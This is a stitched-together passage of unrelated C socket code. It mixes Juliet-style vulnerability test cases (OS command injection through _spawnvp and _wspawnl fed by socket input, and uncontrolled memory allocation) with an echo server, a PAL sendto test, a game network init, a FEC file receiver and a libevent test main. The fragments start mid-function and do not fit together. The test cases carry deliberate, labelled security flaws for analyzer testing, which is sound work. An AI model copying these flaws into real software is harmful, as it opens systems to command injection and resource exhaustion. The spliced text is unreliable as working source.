if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR)
{
break;
}
acceptSocket = accept(listenSocket, NULL, NULL);
if (acceptSocket == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed */
recvResult = recv(acceptSocket, inputBuffer, CHAR_ARRAY_SIZE - 1, 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* NUL-terminate the string */
inputBuffer[recvResult] = '\0';
/* Convert to unsigned int */
data = strtoul(inputBuffer, NULL, 0);
}
while (0);
if (listenSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(listenSocket);
}
if (acceptSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(acceptSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
/* use the function pointer */
funcPtr(data);
}
int main(int argc, char* argv[])
{
SOCKET s,sock;
struct sockaddr_in ser_addr,remote_addr;
int len;
char buf[128];
WSAData wsa;
int retval;
struct socket_list sock_list;
fd_set readfds,writefds,exceptfds;
timeval timeout;
int i;
unsigned long arg;
WSAStartup(0x101,&wsa);
s = socket(AF_INET,SOCK_STREAM,0);
ser_addr.sin_family = AF_INET;
ser_addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
ser_addr.sin_port = htons(0x1234);
bind(s,(sockaddr*)&ser_addr,sizeof(ser_addr));
listen(s,5);
timeout.tv_sec = 1;
timeout.tv_usec = 0;
init_list(&sock_list);
FD_ZERO(&readfds);
FD_ZERO(&writefds);
FD_ZERO(&exceptfds);
sock_list.MainSock = s;
arg = 1;
ioctlsocket(sock_list.MainSock,FIONBIO,&arg);
while(1){
make_fdlist(&sock_list,&readfds);
// make_fdlist(&sock_list,&writefds);
// make_fdlist(&sock_list,&exceptfds);
retval = select(0,&readfds,&writefds,&exceptfds,&timeout);
if(retval == SOCKET_ERROR){
retval = WSAGetLastError();
break;
}
if(FD_ISSET(sock_list.MainSock,&readfds)){
len = sizeof(remote_addr);
sock = accept(sock_list.MainSock,(sockaddr*)&remote_addr,&len);
if(sock == SOCKET_ERROR)
continue;
printf("accept a connection\n");
insert_list(sock,&sock_list);
}
for(i = 0;i < 64;i++){
if(sock_list.sock_array[i] == 0)
continue;
sock = sock_list.sock_array[i];
if(FD_ISSET(sock,&readfds)){
retval = recv(sock,buf,128,0);
if(retval == 0){
closesocket(sock);
printf("close a socket\n");
delete_list(sock,&sock_list);
continue;
}else if(retval == -1){
retval = WSAGetLastError();
if(retval == WSAEWOULDBLOCK)
continue;
closesocket(sock);
printf("close a socket\n");
delete_list(sock,&sock_list);
continue;
}
buf[retval] = 0;
printf("->%s\n",buf);
send(sock,"ACK by server",13,0);
}
//if(FD_ISSET(sock,&writefds)){
//}
//if(FD_ISSET(sock,&exceptfds)){
}
FD_ZERO(&readfds);
FD_ZERO(&writefds);
FD_ZERO(&exceptfds);
}
closesocket(sock_list.MainSock);
WSACleanup();
return 0;
}
void badSource(wchar_t * &data)
{
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
wchar_t *replace;
SOCKET listenSocket = INVALID_SOCKET;
SOCKET acceptSocket = INVALID_SOCKET;
size_t dataLen = wcslen(data);
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a listen socket */
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listenSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(TCP_PORT);
if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR)
{
break;
}
acceptSocket = accept(listenSocket, NULL, NULL);
if (acceptSocket == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed */
recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(wchar_t) * (100 - dataLen - 1), 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* Append null terminator */
data[dataLen + recvResult / sizeof(wchar_t)] = L'\0';
/* Eliminate CRLF */
replace = wcschr(data, L'\r');
if (replace)
{
*replace = L'\0';
}
replace = wcschr(data, L'\n');
if (replace)
{
*replace = L'\0';
}
}
while (0);
if (listenSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(listenSocket);
}
if (acceptSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(acceptSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
}
void CWE78_OS_Command_Injection__char_listen_socket_w32_spawnvp_13_bad()
{
char * data;
char dataBuffer[100] = "";
data = dataBuffer;
if(GLOBAL_CONST_FIVE==5)
{
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
char *replace;
SOCKET listenSocket = INVALID_SOCKET;
SOCKET acceptSocket = INVALID_SOCKET;
size_t dataLen = strlen(data);
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a listen socket */
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listenSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(TCP_PORT);
if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR)
{
break;
}
acceptSocket = accept(listenSocket, NULL, NULL);
if (acceptSocket == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed */
recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(char) * (100 - dataLen - 1), 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* Append null terminator */
data[dataLen + recvResult / sizeof(char)] = '\0';
/* Eliminate CRLF */
replace = strchr(data, '\r');
if (replace)
{
*replace = '\0';
}
replace = strchr(data, '\n');
if (replace)
{
*replace = '\0';
}
}
while (0);
if (listenSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(listenSocket);
}
if (acceptSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(acceptSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
}
{
char *args[] = {COMMAND_INT_PATH, COMMAND_ARG1, COMMAND_ARG2, COMMAND_ARG3, NULL};
/* spawnvp - searches for the location of the command among
* the directories specified by the PATH environment variable */
/* POTENTIAL FLAW: Execute command without validating input possibly leading to command injection */
_spawnvp(_P_WAIT, COMMAND_INT, args);
}
}
void CWE789_Uncontrolled_Mem_Alloc__malloc_wchar_t_connect_socket_44_bad()
{
size_t data;
/* define a function pointer */
void (*funcPtr) (size_t) = badSink;
/* Initialize data */
data = 0;
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
SOCKET connectSocket = INVALID_SOCKET;
char inputBuffer[CHAR_ARRAY_SIZE];
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a connect socket */
connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connectSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr(IP_ADDRESS);
service.sin_port = htons(TCP_PORT);
if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed, make sure to recv one
* less char than is in the recv_buf in order to append a terminator */
recvResult = recv(connectSocket, inputBuffer, CHAR_ARRAY_SIZE - 1, 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* NUL-terminate the string */
inputBuffer[recvResult] = '\0';
/* Convert to unsigned int */
data = strtoul(inputBuffer, NULL, 0);
}
while (0);
if (connectSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(connectSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
/* use the function pointer */
funcPtr(data);
}
int __cdecl main(int argc, char *argv[])
{
WORD VersionRequested = MAKEWORD(2, 2);
WSADATA WsaData;
int err;
int InvalidSocketID = -1; /*set an invalid socket descriptor*/
struct sockaddr_in mySockaddr;
const char *data = "sendto and recvfrom test";
int nBuffer=strlen(data);
/*Initialize the PAL environment*/
err = PAL_Initialize(argc, argv);
if(0 != err)
{
return FAIL;
}
/*initialize to use winsock2 .dll*/
err = WSAStartup(VersionRequested, &WsaData);
if(err != 0)
{
Fail("\nFailed to find a usable WinSock DLL!\n");
}
/*Confirm that the WinSock DLL supports 2.2.*/
if(LOBYTE( WsaData.wVersion ) != 2 ||
HIBYTE( WsaData.wVersion ) != 2)
{
Trace("\nFailed to find a usable WinSock DLL!\n");
err = WSACleanup();
if(SOCKET_ERROR == err)
{
Trace("\nFailed to call WSACleanup API!\n");
}
Fail("");
}
/*prepare the sockaddr_in structure*/
mySockaddr.sin_family = AF_INET;
mySockaddr.sin_port = getRotorTestPort();
mySockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
memset(&(mySockaddr.sin_zero), 0, 8);
/*call sendto by passing an invalid socket*/
err=sendto(InvalidSocketID, data, nBuffer, 0,
(struct sockaddr *)&mySockaddr, sizeof(struct sockaddr));
if(WSAENOTSOCK != GetLastError() || SOCKET_ERROR != err)
{
Trace("\nFailed to call sendto API for a negative test "
"by passing invalid socket!\n");
err = WSACleanup();
if(SOCKET_ERROR == err)
{
Trace("\nFailed to call WSACleanup API!\n");
}
Fail("");
}
err = WSACleanup();
if(SOCKET_ERROR == err)
{
Fail("\nFailed to call WSACleanup API!\n");
}
PAL_Terminate();
return PASS;
}
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int WINS_Init(void)
{
int i;
struct hostent *local;
char buff[MAXHOSTNAMELEN];
struct sockaddr_s addr;
char *p;
int r;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(1, 1);
r = WSAStartup (wVersionRequested, &winsockdata);
if (r)
{
WinPrint("Winsock initialization failed.\n");
return -1;
}
/*
i = COM_CheckParm ("-udpport");
if (i == 0)*/
net_hostport = DEFAULTnet_hostport;
/*
else if (i < com_argc-1)
net_hostport = Q_atoi (com_argv[i+1]);
else
Sys_Error ("WINS_Init: you must specify a number after -udpport");
*/
// determine my name & address
gethostname(buff, MAXHOSTNAMELEN);
local = gethostbyname(buff);
myAddr = *(int *)local->h_addr_list[0];
// if the quake hostname isn't set, set it to the machine name
// if (Q_strcmp(hostname.string, "UNNAMED") == 0)
{
// see if it's a text IP address (well, close enough)
for (p = buff; *p; p++)
if ((*p < '0' || *p > '9') && *p != '.')
break;
// if it is a real name, strip off the domain; we only want the host
if (*p)
{
for (i = 0; i < 15; i++)
if (buff[i] == '.')
break;
buff[i] = 0;
}
// Cvar_Set ("hostname", buff);
}
if ((net_controlsocket = WINS_OpenSocket (0)) == -1)
WinError("WINS_Init: Unable to open control socket\n");
((struct sockaddr_in *)&broadcastaddr)->sin_family = AF_INET;
((struct sockaddr_in *)&broadcastaddr)->sin_addr.s_addr = INADDR_BROADCAST;
((struct sockaddr_in *)&broadcastaddr)->sin_port = htons((u_short)net_hostport);
WINS_GetSocketAddr (net_controlsocket, &addr);
strcpy(my_tcpip_address, WINS_AddrToString (&addr));
p = strrchr (my_tcpip_address, ':');
if (p) *p = 0;
WinPrint("Winsock Initialized\n");
return net_controlsocket;
} //end of the function WINS_Init
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
int sock, len;
char p[4096], *fname = "x.fec";
struct timeval tv;
fd_set set;
FILE *f;
fecDecoder *d;
struct ip_mreq mreq;
#if defined (WIN32) || defined (__CYGWIN__)
WSADATA localWSA;
if (WSAStartup (MAKEWORD(1,1),&localWSA) != 0) {
fprintf (stderr, "Unable to load wsock32.dll\n");
mainreturn (1);
}
#endif
fprintf (stderr, "%s: %s\n", argv[0], FEC_COPYRIGHT);
if ((sock = socket (PF_INET, SOCK_DGRAM, 0)) == -1) {
fprintf (stderr, "Unable to make internet socket\n");
mainreturn (3);
}
memset (&sin, 0, sizeof (sin));
sin.sin_family = AF_INET;
*(unsigned*)&sin.sin_addr = 0; //inet_addr (iface);
sin.sin_port = SUGGESTED_FEC_UDP_PORT_NUMBER;
for (;argc > 1; argc--, argv++) {
if (strcmp (argv[1], "-h") == 0) {
fprintf (stderr,
"Usage : %s [-f %s] [-p portNumber] [-i interface] [-m multicastAddress]\n"
"Receives a file and exits. If the file was received successfully\n"
"it is called `%s' (adjustable with -f), otherwise it is deleted.\n"
"Note that the interface is the IP address of the local device\n",
argv[0], fname, fname);
mainreturn (4);
}
else if (strcmp (argv[1], "-f") == 0) {
fname = argv[2];
argc--, argv++;
}
else if (strcmp (argv[1], "-p") == 0) {
sin.sin_port = htons (atoi (argv[2]));
argc--, argv++;
}
else if (strcmp (argv[1], "-i") == 0) {
*(unsigned*)&sin.sin_addr = inet_addr (argv[2]);
argc--, argv++;
}
else if (strcmp (argv[1], "-m") == 0) {
*(unsigned*)&mreq.imr_multiaddr = inet_addr (argv[2]);
*(unsigned*)&mreq.imr_interface = *(unsigned*)&sin.sin_addr;
if (setsockopt (sock, IPPROTO_IP, IP_ADD_MEMBERSHIP, (char*) &mreq,
sizeof(mreq)) < 0) fprintf (stderr, "Unable to active multicast\n");
}
else fprintf (stderr, "Unknown option %s. Use -h for help\n", argv[1]);
}
if (bind (sock, (struct sockaddr*) &sin, sizeof (sin)) == -1) {
fprintf (stderr, "Error : UDP port or device is unavailable\n");
mainreturn (1);
}
f = fopen (fname, "w");
d = NewFecDecoder (f, WriteF);
do {
len = recv (sock, p, sizeof (p), 0);
FecDecode (p, len, 1, d);
FD_ZERO (&set);
FD_SET (sock, &set);
tv.tv_sec = 30;
tv.tv_usec = 0;
} while (select (sock + 1, &set, NULL, NULL, &tv) != 0);
FlushFecDecoder (d);
fclose (f);
fprintf (stderr, "File received. %d packets was unrecoverable out of %d\n",
d->lostPackets,
(d->lostPackets + d->receivedPackets + d->correctedPackets));
if (d->lostPackets > 0) unlink (fname);
closesocket (sock);
mainreturn (0);
}
int
main(int argc, char **argv)
{
int i,j;
double ratio;
#ifdef _WIN32
WORD wVersionRequested = MAKEWORD(2,2);
WSADATA wsaData;
int err;
err = WSAStartup(wVersionRequested, &wsaData);
#endif
#ifndef _WIN32
if (signal(SIGPIPE, SIG_IGN) == SIG_ERR)
return 1;
#endif
for (i = 1; i < argc; ++i) {
for (j = 0; options[j].name; ++j) {
if (!strcmp(argv[i],options[j].name)) {
if (handle_option(argc,argv,&i,&options[j])<0)
return 1;
goto again;
}
}
fprintf(stderr, "Unknown option '%s'\n", argv[i]);
usage();
return 1;
again:
;
}
if (cfg_help) {
usage();
return 0;
}
cfg_tick.tv_sec = cfg_tick_msec / 1000;
cfg_tick.tv_usec = (cfg_tick_msec % 1000)*1000;
seconds_per_tick = ratio = cfg_tick_msec / 1000.0;
cfg_connlimit *= ratio;
cfg_grouplimit *= ratio;
{
struct timeval tv;
evutil_gettimeofday(&tv, NULL);
#ifdef _WIN32
srand(tv.tv_usec);
#else
srandom(tv.tv_usec);
#endif
}
#ifndef EVENT__DISABLE_THREAD_SUPPORT
evthread_enable_lock_debuging();
#endif
return test_ratelimiting();
}
void CWE78_OS_Command_Injection__wchar_t_listen_socket_w32spawnl_18_bad()
{
wchar_t * data;
wchar_t dataBuffer[100] = L"";
data = dataBuffer;
goto source;
source:
{
#ifdef _WIN32
WSADATA wsaData;
int wsaDataInit = 0;
#endif
int recvResult;
struct sockaddr_in service;
wchar_t *replace;
SOCKET listenSocket = INVALID_SOCKET;
SOCKET acceptSocket = INVALID_SOCKET;
size_t dataLen = wcslen(data);
do
{
#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
break;
}
wsaDataInit = 1;
#endif
/* POTENTIAL FLAW: Read data using a listen socket */
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (listenSocket == INVALID_SOCKET)
{
break;
}
memset(&service, 0, sizeof(service));
service.sin_family = AF_INET;
service.sin_addr.s_addr = INADDR_ANY;
service.sin_port = htons(TCP_PORT);
if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
{
break;
}
if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR)
{
break;
}
acceptSocket = accept(listenSocket, NULL, NULL);
if (acceptSocket == SOCKET_ERROR)
{
break;
}
/* Abort on error or the connection was closed */
recvResult = recv(acceptSocket, (char *)(data + dataLen), sizeof(wchar_t) * (100 - dataLen - 1), 0);
if (recvResult == SOCKET_ERROR || recvResult == 0)
{
break;
}
/* Append null terminator */
data[dataLen + recvResult / sizeof(wchar_t)] = L'\0';
/* Eliminate CRLF */
replace = wcschr(data, L'\r');
if (replace)
{
*replace = L'\0';
}
replace = wcschr(data, L'\n');
if (replace)
{
*replace = L'\0';
}
}
while (0);
if (listenSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(listenSocket);
}
if (acceptSocket != INVALID_SOCKET)
{
CLOSE_SOCKET(acceptSocket);
}
#ifdef _WIN32
if (wsaDataInit)
{
WSACleanup();
}
#endif
}
/* wspawnl - specify the path where the command is located */
/* POTENTIAL FLAW: Execute command without validating input possibly leading to command injection */
_wspawnl(_P_WAIT, COMMAND_INT_PATH, COMMAND_INT_PATH, COMMAND_ARG1, COMMAND_ARG2, COMMAND_ARG3, NULL);
}
